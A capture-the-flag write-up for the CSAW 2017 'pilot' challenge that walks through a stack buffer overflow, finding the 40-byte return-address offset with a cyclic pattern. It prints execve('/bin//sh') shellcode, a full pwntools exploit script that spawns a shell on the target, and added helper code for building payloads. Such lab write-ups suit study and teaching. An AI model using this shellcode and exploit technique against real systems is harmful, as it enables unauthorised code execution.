PWN Learning: CSAW 2017 Quals - pilot

CSAW 2017 Quals - pilot Write up

A C++ pwn challenge. Decompiling the binary with IDA Pro recovers readable pseudocode for the vulnerable function:

image.png

The decompiled code immediately shows a stack buffer overflow: the program reads more input than the fixed-size stack buffer can hold, so everything after the buffer (up to and including the saved return address) can be overwritten.

Debug it in gdb: generate a 100-byte cyclic pattern with peda's pattern_create, feed it as input, and the program crashes. The pattern bytes that end up at the crash site identify where in the input they came from (pattern_offset does the lookup):

image.png

The offset works out to 40 bytes: the first 40 bytes of input reach the saved return address, and the next 8 bytes overwrite it.
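How pattern_create and pattern_offset actually find that 40 is shown below as an added example; this code is not part of the original write-up and does not touch the challenge binary. It builds a de Bruijn sequence (the idea behind peda's pattern_create and pwntools' cyclic()), models a frame whose saved return address is 40 bytes into the buffer, and looks the crash value back up. The 40-byte frame layout is the write-up's; the function names are mine.

```python
import string

ALPHABET = string.ascii_lowercase.encode()


def de_bruijn(length, n=8, alphabet=ALPHABET):
    """Return the first `length` bytes of a de Bruijn sequence over `alphabet`
    with window size `n`: every n-byte slice is unique, so a slice that shows up
    in a register or at the crash site identifies its position in the input."""
    k = len(alphabet)
    a = [0] * k * n
    seq = []

    def db(t, p):
        if len(seq) >= length:  # stop early; only a short prefix is needed
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def pattern_offset(pattern, value, n=8):
    """Find where the n bytes `value` came from. `value` is either the raw bytes
    read at the crash site or the integer a register held (decoded little-endian,
    the way the CPU loaded it). Returns -1 if the bytes are not in the pattern."""
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    return pattern.find(value[:n])


def simulate_overflow(pattern, ret_offset=40):
    """Stand-in for the real crash: model a frame whose saved return address
    starts `ret_offset` bytes into the overflowed buffer and return the 8-byte
    value `ret` would pop, exactly as gdb would display it."""
    return int.from_bytes(pattern[ret_offset:ret_offset + 8], "little")


if __name__ == "__main__":
    pat = de_bruijn(100)
    crash_value = simulate_overflow(pat)
    print(f"value at the crash site: {crash_value:#x}")
    print(f"offset: {pattern_offset(pat, crash_value)}")
```

One x86-64 caveat when reading the real crash: a garbage return address is non-canonical, so the fault happens on the `ret` instruction itself and RIP still points at the `ret`. Take the 8 bytes at RSP (the value `ret` tried to pop), not RIP, and feed those to pattern_offset.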

This exploit only works because the stack is executable (NX is disabled for this binary; confirm with checksec) and the program leaks the address of the buffer, so the shellcode can live in the buffer itself and the return address can point straight at it. Use the following shellcode, which calls execve("/bin//sh", NULL, NULL):

 0:  31 f6                           xor    esi, esi
 2:  48 bb 2f 62 69 6e 2f 2f 73 68   movabs rbx, 0x68732f2f6e69622f   ; "/bin//sh"
 c:  56                              push   rsi                       ; NUL terminator
 d:  53                              push   rbx                       ; string now on the stack
 e:  54                              push   rsp
 f:  5f                              pop    rdi                       ; rdi = &"/bin//sh"
10:  6a 3b                           push   0x3b
12:  58                              pop    rax                       ; rax = 59 = SYS_execve
13:  31 d2                           xor    edx, edx                  ; rdx = NULL (envp)
15:  0f 05                           syscall

Decode it as x86-64: a 32-bit disassembler misreads the `48` REX.W prefix as `dec eax` and splits the 8-byte immediate into `das` / `jae` garbage. rsi is already zero from the first instruction, so argv is NULL as well.

Run it against the service and get the flag:

image.png

Here is the full exploit script:

from pwn import *

context.arch = 'amd64'   # needed so disasm() decodes the bytes as x86-64

# execve("/bin//sh", NULL, NULL): 23 bytes, no NUL bytes
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
# print(disasm(shellcode))

#io = process("./easy_pwn")
io = remote("xxx.xxx.xxx.xxx", xxxx)

# The program prints the address of the stack buffer after "Location:";
# the leak is "0x" plus 12 hex digits, i.e. 14 characters
io.recvuntil(b"Location:")
addr = int(io.recv()[0:14], 16)
# print(hex(addr))

# Layout: shellcode at the start of the buffer, padding up to the saved
# return address at offset 40, then the leaked buffer address so that
# ret lands on the shellcode
io.sendline(shellcode + b'a' * (40 - len(shellcode)) + p64(addr))
io.interactive()
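To check the shellcode and the payload layout without a live target, here is an added example that is not part of the original write-up and needs neither pwntools nor the challenge binary. It parses a constructed "Location:" leak line (the exact output format of the real service is an assumption modelled on the script's recv()[0:14]), reads the path and syscall number back out of the shellcode bytes, and assembles the same 48-byte payload the script sends. The helper names are mine.

```python
import struct

# execve("/bin//sh", NULL, NULL) for x86-64, the 23 bytes from the write-up
SHELLCODE = (
    b"\x31\xf6"                                    # xor  esi, esi       -> rsi = NULL (argv)
    b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"    # movabs rbx, "/bin//sh"
    b"\x56"                                        # push rsi            -> 8 NUL bytes terminate the string
    b"\x53"                                        # push rbx            -> "/bin//sh" now on the stack
    b"\x54\x5f"                                    # push rsp ; pop rdi  -> rdi = pointer to the string
    b"\x6a\x3b\x58"                                # push 0x3b ; pop rax -> rax = 59 (SYS_execve)
    b"\x31\xd2"                                    # xor  edx, edx       -> rdx = NULL (envp)
    b"\x0f\x05"                                    # syscall
)
RET_OFFSET = 40  # distance from the buffer start to the saved return address


def parse_location_leak(data):
    """Pull the leaked buffer address out of the program's 'Location:' output
    (the surrounding line format is an assumption; the 14-character
    '0x' + 12 hex digits slice matches the write-up's recv()[0:14])."""
    after = data.split(b"Location:", 1)[1].strip()
    return int(after[:14].decode(), 16)


def describe_shellcode(sc):
    """Read the string and syscall number back out of the shellcode bytes,
    as a cheap check that the bytes really encode execve('/bin//sh', ...)."""
    if sc[2:4] != b"\x48\xbb":
        raise ValueError("expected REX.W mov rbx, imm64 at offset 2")
    path = sc[4:12].decode()          # the 8-byte immediate is the path itself
    if sc[16] != 0x6a:
        raise ValueError("expected push imm8 at offset 16")
    return path, sc[17]               # imm8 operand = syscall number


def build_payload(buf_addr, shellcode=SHELLCODE, ret_offset=RET_OFFSET):
    """[shellcode][padding up to ret_offset][saved return address := buf_addr].
    The shellcode sits at the very start of the buffer, so the leaked buffer
    address is exactly where `ret` must return to."""
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode does not fit in front of the return address")
    if b"\x00" in shellcode:
        # irrelevant for a read()-style copy, fatal for a strcpy-style one
        raise ValueError("shellcode contains a NUL byte")
    padding = b"a" * (ret_offset - len(shellcode))
    return shellcode + padding + struct.pack("<Q", buf_addr)


if __name__ == "__main__":
    # constructed sample of the service's output; not captured from the real target
    leak = b"[*]Location:0x7ffd4c1e2b80\n[*]Command:"
    addr = parse_location_leak(leak)
    print(describe_shellcode(SHELLCODE), hex(addr))
    print(build_payload(addr).hex())
```

If a variant of the challenge leaked a different address (say, the base of a larger buffer), only `build_payload`'s return-address argument would change; the 40-byte offset comes from the frame layout, not from the leak.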


Author: ACce1er4t0r
Posted on: 2022-03-17
Updated on: 2023-04-22